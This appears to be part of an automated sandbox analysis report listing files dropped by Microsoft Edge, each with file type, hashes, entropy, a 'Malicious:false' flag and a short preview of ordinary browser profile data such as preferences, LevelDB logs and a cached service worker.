                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377747731435546","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377747731435546","location":5,"ma
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):24853
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.565133283975249
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:W+OAYjWIJW5wPzf4jm8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPtRIgtZrrwXLpBtuk:WDJjzJWaPzfqmu1jak3zgftj
                                                                                                                                                                                                                                                                                                    MD5:87222E5DE19592B82B29F2F42B282670
                                                                                                                                                                                                                                                                                                    SHA1:A8C13C7ED3D569ADFCFBF645EC125718726C91DC
                                                                                                                                                                                                                                                                                                    SHA-256:787D7744DD26C4AD1381210FAFA28C6CC7644028AB5695C135D9D9B68DE09F0F
                                                                                                                                                                                                                                                                                                    SHA-512:70B79E198C8EB0719AFA3915761BF56B046B4C88C4E41DF534CE8515CCB383C3F3C070681A2F6149DB6F8B6D756AD5BEA6EE153063B4BAD0F34160DD1123200F
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377747731435546","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377747731435546","location":5,"ma
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                                    MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                                    SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                                    SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                                    SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):303
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.10219519088815
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXUB1N723oH+TcwtE/a252KLlkXU2Oq2PN723oH+TcwtE/a2ZIFUv:0waYeb8xLcU2OvVaYeb8J2FUv
                                                                                                                                                                                                                                                                                                    MD5:4BD93A2FAE5603F6F23C700DE238441F
                                                                                                                                                                                                                                                                                                    SHA1:8BD8F2F2C1CA286DEE896F9897E56E7D014965E1
                                                                                                                                                                                                                                                                                                    SHA-256:4D7CC95D061487BAA7E2493674F2F4C554DEFD8938D468ABA63C2537D139D4C3
                                                                                                                                                                                                                                                                                                    SHA-512:AC5AF038F7E5D23C3014D9F72C16F2B2309083BC22C2D25182D4A4DC545D77E5C5AEE88D50A635192A94F8D5F967FE743C4C0357DAA3500AB5F780096C5D68E2
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:28.995 15b0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/03-20:02:29.010 15b0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):114376
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.578220245234728
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:1536:AU906yxPXfOxr1lhCe1nL/rmL/rBZXECjAWNKPj3dfvYgi5mso:d9LyxPXfOxr1lMe1nL/CL/TXEmmvFj
                                                                                                                                                                                                                                                                                                    MD5:2F55605709130ECC40FDD952533F434B
                                                                                                                                                                                                                                                                                                    SHA1:53344B273EC19E5FC69A5987B3682C539B49FC14
                                                                                                                                                                                                                                                                                                    SHA-256:BCA5A9143DF3EECBF88D34B42465E7D99586F7B066F8816276F3198A6AF411DC
                                                                                                                                                                                                                                                                                                    SHA-512:D6DED207D81EFF60ED4670AB61CCB46CF08A21A5972553D98D7B25C27AB40658EC4D7C45FC4408569FBA74363B81581EB0013D19C03C38007F3A37EDEF9CD12A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):188873
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.384835508765822
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3072:djDEblLC7Nwtw3gX8LHEL/W8MHOJ11+1TiGyx+WC:gHtwXLkL/jYs1+rzN
                                                                                                                                                                                                                                                                                                    MD5:911A5492432B88D6423B00AABC5148B9
                                                                                                                                                                                                                                                                                                    SHA1:2785BEC763AA33BAEE65BF3C43C9D2768CC9A23C
                                                                                                                                                                                                                                                                                                    SHA-256:063397F4604D1EFB8A4620E1DAB5C9F4DEEB229858C20BF9CD07611448F4FF2A
                                                                                                                                                                                                                                                                                                    SHA-512:5A1B3980A92088A67BE79C488EFC262CF574DBFD665517EB4742331CA0B62FABCB625CBD59EB1A02E06E9E27C51C67ABFC39B1A811414C5F9BF514F6CC3CF589
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:0\r..m..........rSG.....0...../...............R......yTp........,T.8..`,.....L`.....,T...`......L`......Rc*.c.....exports...Rc..7.....module....Rc........define....Rb.L......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m....Db...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....zY...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                    MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                    SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                    SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                    SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:+UfC0Xl/ly/l9/lxE0tlla/lJx1C:+MNmO0g9C
                                                                                                                                                                                                                                                                                                    MD5:D97F0AEDA6A4A87C1EF84586828AD572
                                                                                                                                                                                                                                                                                                    SHA1:EC6515173EC27B3D8712CB7B1D4D91C327D12191
                                                                                                                                                                                                                                                                                                    SHA-256:49F5858CC7E865925B887BCF31379A2F0E7BB1719A797FF14FA074222422B08C
                                                                                                                                                                                                                                                                                                    SHA-512:B95FBD169FCDB500B5F1601C0CCFEB7CF23F73D8CCE758461004523BFC8BE99E432A78261A3BFA5D0ED45F9CFACB9C57120C4BA090365369B7A34716EEA41DF4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:@....q.&oy retne.........................X....,....................../.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:+UfC0Xl/ly/l9/lxE0tlla/lJx1C:+MNmO0g9C
                                                                                                                                                                                                                                                                                                    MD5:D97F0AEDA6A4A87C1EF84586828AD572
                                                                                                                                                                                                                                                                                                    SHA1:EC6515173EC27B3D8712CB7B1D4D91C327D12191
                                                                                                                                                                                                                                                                                                    SHA-256:49F5858CC7E865925B887BCF31379A2F0E7BB1719A797FF14FA074222422B08C
                                                                                                                                                                                                                                                                                                    SHA-512:B95FBD169FCDB500B5F1601C0CCFEB7CF23F73D8CCE758461004523BFC8BE99E432A78261A3BFA5D0ED45F9CFACB9C57120C4BA090365369B7A34716EEA41DF4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:@....q.&oy retne.........................X....,....................../.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):72
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:+UfC0Xl/ly/l9/lxE0tlla/lJx1C:+MNmO0g9C
                                                                                                                                                                                                                                                                                                    MD5:D97F0AEDA6A4A87C1EF84586828AD572
                                                                                                                                                                                                                                                                                                    SHA1:EC6515173EC27B3D8712CB7B1D4D91C327D12191
                                                                                                                                                                                                                                                                                                    SHA-256:49F5858CC7E865925B887BCF31379A2F0E7BB1719A797FF14FA074222422B08C
                                                                                                                                                                                                                                                                                                    SHA-512:B95FBD169FCDB500B5F1601C0CCFEB7CF23F73D8CCE758461004523BFC8BE99E432A78261A3BFA5D0ED45F9CFACB9C57120C4BA090365369B7A34716EEA41DF4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:@....q.&oy retne.........................X....,....................../.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):6497
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.380823435785971
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:192:r1c6n7TEJXXJT/9Xp+HKiiDd5SLl9iSrYDh3:hXwnJT/9Xp+q/5SLl9iSr8R
                                                                                                                                                                                                                                                                                                    MD5:0C856CC7A3B1595C0D85D9A33DD142AB
                                                                                                                                                                                                                                                                                                    SHA1:36F360FF11B61F708B84ED42E7C1C0BAF10D9F76
                                                                                                                                                                                                                                                                                                    SHA-256:FDA4A4C636AC58854ECF9EA7C850B87DAC2E4A4028D5D2B676BD219B5EDF756A
                                                                                                                                                                                                                                                                                                    SHA-512:DB8367F655AA3F38F651832D97D616188918AAB7B87BE9804FE02CB30287BE42F68E64621A648E3072147DC4683278A7D0C14FAB6711921642759F1AB5CF502C
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................WIb................next-map-id.1.Cnamespace-e348396a_9711_4835_b617_6d795084a9c8-https://ntp.msn.com/.0U...................map-0-shd_sweeper./{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.e.h.p.s.b.h.v.,.b.i.n.g._.v.2._.s.c.o.p.e.-.c.,.p.r.g.-.1.s.-.d.w.v.i.d.-.c.t.r.,.p.r.g.-.1.s.w.-.s.a.-.m.a.i.p.r.o.f.i.l.e._.t.2.,.p.r.g.-.1.s.w.-.p.r.g.1.r.e.t.r.y.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.1.s.-.w.p.o.-.p.r.1.-.s.d.s.h.p.1.5.,.p.r.g.-.1.s.w.-.d.e.f.e.r.c.o.n.,.2.4.0.9.-.n.e.w.-.b.i.n.g.-.d.e.s.i.g.n.-.c.,.p.r.g.-.a.d.s.p.e.e.k.,.1.s.-.n.t.f.1.-.r.d.i.d.2.a.,.1.s.-.n.t.f.1.-.f.s.p.t.b.r.c.,.1.s.-.n.t.f.1.-.p.n.o.t.s.,.1.s.-.n.t.f.1.-.r.d.i.d.2.,.1.s.-.n.t.f.1.-.r.d.i.d.x.2.,.p.r.g.-.1.s.w.-.m.o.n.e.x.p.b.,.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0263364722538775
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXgQ73+q2PN723oH+TcwtrQMxIFUt8vXgQUWZmw+vXgMiVkwON723oH+TcwtrQMT:0R+vVaYebCFUt8PWW/+PKV5OaYebtJ
                                                                                                                                                                                                                                                                                                    MD5:BC80C092E36380DA3A047F30593FF88D
                                                                                                                                                                                                                                                                                                    SHA1:F4F025389DD88D1B03E96A80871301A79355612D
                                                                                                                                                                                                                                                                                                    SHA-256:82E0EC931355A5B2E66E92DDC38CC39B95DD3CE6C4E76658E34F2DD93FB02116
                                                                                                                                                                                                                                                                                                    SHA-512:70D269BCD5328815FF5757F191AF40E06DB7208EA2AC7B246290C6806F528CF36AEBF25BAFB16AC561A35F7EBCB43FEE9481BC3A7E64B22994886B4FE474F707
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:12.451 1a2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/03-20:02:12.453 1a2c Recovering log #3.2024/12/03-20:02:12.461 1a2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0263364722538775
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXgQ73+q2PN723oH+TcwtrQMxIFUt8vXgQUWZmw+vXgMiVkwON723oH+TcwtrQMT:0R+vVaYebCFUt8PWW/+PKV5OaYebtJ
                                                                                                                                                                                                                                                                                                    MD5:BC80C092E36380DA3A047F30593FF88D
                                                                                                                                                                                                                                                                                                    SHA1:F4F025389DD88D1B03E96A80871301A79355612D
                                                                                                                                                                                                                                                                                                    SHA-256:82E0EC931355A5B2E66E92DDC38CC39B95DD3CE6C4E76658E34F2DD93FB02116
                                                                                                                                                                                                                                                                                                    SHA-512:70D269BCD5328815FF5757F191AF40E06DB7208EA2AC7B246290C6806F528CF36AEBF25BAFB16AC561A35F7EBCB43FEE9481BC3A7E64B22994886B4FE474F707
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:2024/12/03-20:02:12.451 1a2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/03-20:02:12.453 1a2c Recovering log #3.2024/12/03-20:02:12.461 1a2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1443
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.837850339614114
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:3BHdA0UbPgLpsAF4unx1wOgtLp3X2amEtG1ChqgDvDAQKkOAM4:3xdyP4zFqLp2FEkChFvtHOp
                                                                                                                                                                                                                                                                                                    MD5:6951B6E08A971D770868F7EC4F436F65
                                                                                                                                                                                                                                                                                                    SHA1:B797623C37D8AA9A5F3EBA844563D83A6D44CA5B
                                                                                                                                                                                                                                                                                                    SHA-256:CDD2C3521D32164D27BC11F0CEE7B97298A906F72625261BE0799F8260081BEB
                                                                                                                                                                                                                                                                                                    SHA-512:BBBDA0EF92179704813BB6A89C5548C73D18628D2C77C528899779A597AC72431ACFECACBE83DADB943B5302EC01269643F0120B9C42089D0108DE6713E08657
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SNSS..........]..............]......"...]..............]..........]..........]..........]....!.....]..................................]...]1..,......]$...e348396a_9711_4835_b617_6d795084a9c8......]..........]....v#J...........]......]..........................]....................5..0......]&...{46F3A197-DB49-410A-81B3-94975C835573}........]..........].............................]..............]........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......tB%Ug(..uB%Ug(.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                    MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                    SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                    SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                    SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):356
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.105331283718764
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:6:iXbTN+q2PN723oH+Tcwt7Uh2ghZIFUt8vXbQFBZmw+vXbQFVVkwON723oH+Tcwts:0b8vVaYebIhHh2FUt8PbQFB/+PbQFb5g
                                                                                                                                                                                                                                                                                                    MD5:43633420EEC92FB910D8337D23E3C9F8
                                                                                                                                                                                                                                                                                                    SHA1:8DCBA5EEFF45D4B7D34319B35AE5813F4810D7E5
                                                                                                                                                                                                                                                                                                    SHA-256:6D1C7CD55517432C0B9F87F38F5FC7F453A3EE20FF45DE091F1D3B4B7522FBC5
                                                                                                                                                                                                                                                                                                    SHA-512:0D4C4455F625C276A3B916F8F8740B7CCB8596C70F5938B5574F450F6AF1CF544603084F01EC96E7A71BEE26467C3C153C81F98D7115DB3C411934DAEAB2190B
                                                                                                                                                                                                                                                                                                    Malicious:false
